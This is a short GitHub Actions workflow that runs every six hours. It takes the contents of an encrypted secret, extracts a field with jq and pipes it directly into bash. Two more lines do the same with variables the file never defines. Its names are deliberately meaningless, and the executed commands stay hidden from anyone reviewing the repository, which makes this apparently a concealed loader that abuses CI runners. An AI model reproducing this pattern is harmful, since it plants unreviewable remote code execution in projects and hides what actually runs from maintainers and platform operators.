name: joemoonx

on:
  workflow_dispatch:
  schedule:
    - cron: '59 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: joemoonx
        env:
          nt971: ${{ secrets.nt971 }}
        run: |
          echo $nt971 | jq -r .rkq3309 | /bin/bash
          echo $h2 | jq -r .m08 | /bin/bash
          echo $vkm8604 | jq -r .xk03731 | /bin/bash

